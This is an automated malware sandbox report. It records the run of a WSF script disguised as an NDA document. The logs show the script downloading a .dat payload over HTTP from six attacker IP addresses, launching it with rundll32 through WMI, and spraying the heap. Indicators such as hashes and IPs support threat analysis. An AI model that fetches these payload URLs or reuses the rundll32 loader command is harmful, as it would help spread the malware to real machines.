Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 11, 2023, 9:16 a.m.	May 11, 2023, 9:18 a.m.

Size	39.2KB
Type	UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
MD5	`883bbc5030fbf590ef98edc18c49565b`
SHA256	`b1142e2bb27447560ed144bd576678421de36e669fda3554a1c4f615b5c64c64`
CRC32	`88AA276A`
ssdeep	`768:+dW9PdW9RHWpAwaD6giD6bj1UA/F8fAQh0SGYa5nNpm3DfTt16gBEWN16KTvt:9sRSAwi6gV11F8fveV5NI3Dbt16gB5Nl`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\NDA_D673_May_10.wsf
884
conhost.exe conhost.exe rundll32 C:\Users\Public\ak9R8LPcaj74exY.dat,print
3064

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
144.208.127.242	Active	Moloch
149.102.225.18	Active	Moloch
207.148.14.105	Active	Moloch
45.155.37.101	Active	Moloch
5.42.221.144	Active	Moloch
91.193.16.139	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW May 11, 2023, 9:18 a.m.	computer_name: TEST22-PC	1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://207.148.14.105/ac3Trg8kqFxJaVW.dat
suspicious_features	Connection to IP address				suspicious_request	GET http://149.102.225.18/ac3Trg8kqFxJaVW.dat

Performs some HTTP requests (2 events)

request	GET http://207.148.14.105/ac3Trg8kqFxJaVW.dat
request	GET http://149.102.225.18/ac3Trg8kqFxJaVW.dat

Communicates with host for which no DNS query was performed (6 events)

host	144.208.127.242
host	149.102.225.18
host	207.148.14.105
host	45.155.37.101
host	5.42.221.144
host	91.193.16.139

Wscript.exe initiated network communications indicative of a script based payload download (14 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://45.155.37.101/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://5.42.221.144/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://91.193.16.139/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://144.208.127.242/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://207.148.14.105/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
InternetReadFile May 11, 2023, 9:17 a.m.	buffer: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> request_handle: 0x00cc000c	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://149.102.225.18/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
InternetReadFile May 11, 2023, 9:17 a.m.	buffer: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> request_handle: 0x00cc000c	1	1

wscript.exe-based dropper (JScript, VBS) (6 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (22 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://45.155.37.101/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
send May 11, 2023, 9:16 a.m.	buffer: ! socket: 852 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:16 a.m.	url: http://5.42.221.144/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:16 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
send May 11, 2023, 9:16 a.m.	buffer: ! socket: 852 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://91.193.16.139/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 852 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://144.208.127.242/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 852 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://207.148.14.105/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 852 sent: 1	1	1
send May 11, 2023, 9:17 a.m.	buffer: GET /ac3Trg8kqFxJaVW.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: 207.148.14.105 Connection: Keep-Alive socket: 472 sent: 311	1	311
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 852 sent: 1	1	1
InternetCrackUrlW May 11, 2023, 9:17 a.m.	url: http://149.102.225.18/ac3Trg8kqFxJaVW.dat flags: 0	1	1
HttpOpenRequestW May 11, 2023, 9:17 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /ac3Trg8kqFxJaVW.dat	1	13369356
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 852 sent: 1	1	1
send May 11, 2023, 9:17 a.m.	buffer: GET /ac3Trg8kqFxJaVW.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: 149.102.225.18 Connection: Keep-Alive socket: 972 sent: 311	1	311
send May 11, 2023, 9:17 a.m.	buffer: ! socket: 852 sent: 1	1	1

Uses WMI to create a new process (1 event)

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod May 11, 2023, 9:18 a.m.	inargs.CurrentDirectory: None inargs.CommandLine: conhost.exe rundll32 C:\Users\Public\ak9R8LPcaj74exY.dat,print inargs.ProcessStartupInformation: None outargs.ProcessId: 3064 outargs.ReturnValue: 0 flags: 0 method: Create class: Win32_Process	1	0	0

A potential heapspray has been detected. 4178 megabytes was sprayed onto the heap of the wscript.exe process (17 events)

count

2539

name

heapspray

process

wscript.exe

total_mb

228

length

94208

protection

PAGE_READWRITE

count

5076

name

heapspray

process

wscript.exe

total_mb

356

length

73728

protection

PAGE_READWRITE

count

7616

name

heapspray

process

wscript.exe

total_mb

267

length

36864

protection

PAGE_READWRITE

count

5090

name

heapspray

process

wscript.exe

total_mb

length

16384

protection

PAGE_READWRITE

count

2543

name

heapspray

process

wscript.exe

total_mb

149

length

61440

protection

PAGE_READWRITE

count

2538

name

heapspray

process

wscript.exe

total_mb

158

length

65536

protection

PAGE_READWRITE

count

2540

name

heapspray

process

wscript.exe

total_mb

327

length

135168

protection

PAGE_READWRITE

count

15239

name

heapspray

process

wscript.exe

total_mb

773

length

53248

protection

PAGE_READWRITE

count

25428

name

heapspray

process

wscript.exe

total_mb

length

4096

protection

PAGE_READWRITE

count

22868

name

heapspray

process

wscript.exe

total_mb

267

length

12288

protection

PAGE_READWRITE

count

2541

name

heapspray

process

wscript.exe

total_mb

length

32768

protection

PAGE_READWRITE

count

5076

name

heapspray

process

wscript.exe

total_mb

376

length

77824

protection

PAGE_READWRITE

count

2538

name

heapspray

process

wscript.exe

total_mb

208

length

86016

protection

PAGE_READWRITE

count

15238

name

heapspray

process

wscript.exe

total_mb

297

length

20480

protection

PAGE_READWRITE

count

5077

name

heapspray

process

wscript.exe

total_mb

218

length

45056

protection

PAGE_READWRITE

count

7618

name

heapspray

process

wscript.exe

total_mb

178

length

24576

protection

PAGE_READWRITE

count

2543

name

heapspray

process

wscript.exe

total_mb

119

length

49152

protection

PAGE_READWRITE

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 events)

dead_host	5.42.221.144:80
dead_host	91.193.16.139:80
dead_host	45.155.37.101:80
dead_host	144.208.127.242:80

NDA_D673_May_10.wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All